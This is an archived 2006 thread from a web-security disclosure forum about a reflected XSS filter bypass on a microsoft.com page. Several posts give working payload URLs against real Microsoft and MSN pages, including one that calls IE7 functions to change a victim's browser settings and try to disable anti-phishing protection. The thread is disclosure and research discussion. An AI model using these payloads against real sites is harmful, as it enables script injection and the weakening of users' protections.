Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Microsoft proves that blacklist special character combination is not secure
Posted by: Hong
Date: December 14, 2006 05:23PM

This is a XSS Fragmentation Attack.

I discovered a microsoft webpage blacklists special character combination input, any english letter(a-z) followed by left angle bracket(<) is not allow, # followed by & is not allow too, expect that, it allows any input. That means we cannot construst any valid HTML tag directly. Does it secure? No, it doesn't. The webpage filters our input only, microsoft, are you kidding? Browser renders your output.

The webpage accept two inputs, the server appends a character T after first one, then appends the second string after character T. That means we can add a left angle bracket at the end of first string to construst a valid HTML tag starts with <T, the rest we put it in the beginning of the second string.

Here is the PoC:
It works on my IE6 and FF1.5.
Move your mouse over the textarea.
http://www.microsoft.com/hk/presspass/chinese/result.aspx?fm=01/01/2006T12/14/2006%22%3e%3c/script%3e%3c&to=extarea%20cols=1000%20rows=1000%20onmouseover=%22javascript:alert%28%27xss%27%29

Even though it is obscure, there should be easily to exploit it.
I have tried using Table and TD background Vuln, but it doesn't work in my IE6, anyone know why?
I am glad to see anyone exploit it without interaction.
I am sorry that the webpage is in chinese, I haven't test the english version.

- Hong

Options: ReplyQuote
Re: Microsoft proves that blacklist special character combination is not secure
Posted by: rsnake
Date: December 14, 2006 05:51PM

Nice find, Hong! I bet this can be modified to not require user interaction, like you suspected. I think you have found the second XSS issue in Microsoft on the boards ever. They tend to be very secure.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Microsoft proves that blacklist special character combination is not secure
Posted by: maluc
Date: December 14, 2006 08:10PM

Very nice find.. they seem to employ some very extensive QA for their microsoft.com domain. and third actually, counting yourself and thomaspollet

i dont think the same team secures their other domains though, sudomains in live.com, xbox.com, and http://ie.search.msn.com/migrate.asp?SERVER=%3C/script%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx still have XSS (msn one previously disclosed by someone else)

overall, i'm still impressed with the security of their main domain.

-maluc

Options: ReplyQuote
Re: Microsoft proves that blacklist special character combination is not secure
Posted by: maluc
Date: December 14, 2006 08:38PM

and before anyone gets giddy about live.com XSSes for getting hotmail cookies.. it has to be one in the login.live.com sudomain only - which seems well secured. :/

i'm not sure if firefox's or ie's pass managers can be molested from different sudomains (like support.live.com) or from the base domain perhaps (htp://live.com) .. worth testing but my guess is No.

-maluc

Options: ReplyQuote
Re: Microsoft proves that blacklist special character combination is not secure
Posted by: WhiteAcid
Date: December 15, 2006 04:07AM

Nice one Hong, the flaw works in firefox 2.0 and Opera too.

If you use something like http://www.microsoft.com/hk/presspass/chinese/result.aspx?fm=01/01/2006T12/14/2006%22%3e%3c/script%3e%3c&to=extarea%20cols=1000%20rows=1000%20style=%22position:%20absolute;%20top:%200px;%20left:%200px;%22%20onmouseover=%22alert%28%27xss%27%29
Then the user input is easier to trigger (basically made the textarea fill the while screen)

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: Microsoft proves that blacklist special character combination is not secure
Posted by: eyeced
Date: December 15, 2006 12:02PM

>>>> http://www.microsoft.com/hk/presspass/chinese/result.aspx?fm=01/01/2006T12/14/2006%22%3e%3c/script%3e%3c&to=extarea%20cols=1000%20rows=1000%20onmouseover=%22javascript:window.external.customizesettings(false,false,'is-is') <<<<

theres an interesting idea, put forward by maluc in an earlier post with the restriction that the xss had to come from a microsoft domain. just thought i'd mention this as a possible use of this xss. Im sure there are quite alot of things you are able to do from here with the IE7 javascript features.

Ill post some more when i get IE7 installed.



Edited 2 time(s). Last edit at 12/15/2006 12:07PM by eyeced.

Options: ReplyQuote
Re: Microsoft proves that blacklist special character combination is not secure
Posted by: maluc
Date: December 15, 2006 01:00PM

yeah, whenever you first install IE7 it takes you to a microsoft.com page to set up the Anti-phishing options among other things. If you look in the MSDN .. there's a couple special javascript functions that can turn victim's anti-phishing stuff off.. but only if the function is called from the microsoft.com domain. This XSS should be able to utilize those - i'll have to test.

You've got a good memory eyeced ^^

-maluc

Options: ReplyQuote
Re: Microsoft proves that blacklist special character combination is not secure
Posted by: maluc
Date: December 16, 2006 12:15AM

i guess i should've posted it here instead of in a myspace thread. so moved:


okie, i tested it and you are able to add any language you wish as the default language for IE7 using this link:
http://www.microsoft.com/hk/presspass/chinese/result.aspx?fm=01/01/2006T12/14/2006%22%3e%3c/script%3e%3c&to=%20style=%22xx:expression(window.external.CustomizeSettings(false,false,'is-is')%29

goto http://www.google.com afterwards to verify the change (to icelandic). It's also set to disable the anti-phishing toolbar but doesn't seem to have any effect :/

you can, however, determine whether or not they use the anti-phishing filter with:
if(window.external.PhishingEnabled()) alert('its enabled');

Both of those can only be called from a sub.microsoft.com domain (so msdn.microsoft.com will work too)

-maluc

Options: ReplyQuote
Re: Microsoft proves that blacklist special character combination is not secure
Posted by: Hong
Date: December 19, 2006 09:59AM

Perhaps <T style="xx:expression(window.external.CustomizeSettings(false,false,'is-is'))"> doesn't work on IE7.

- Hong

Options: ReplyQuote


Sorry, only registered users may post in this forum.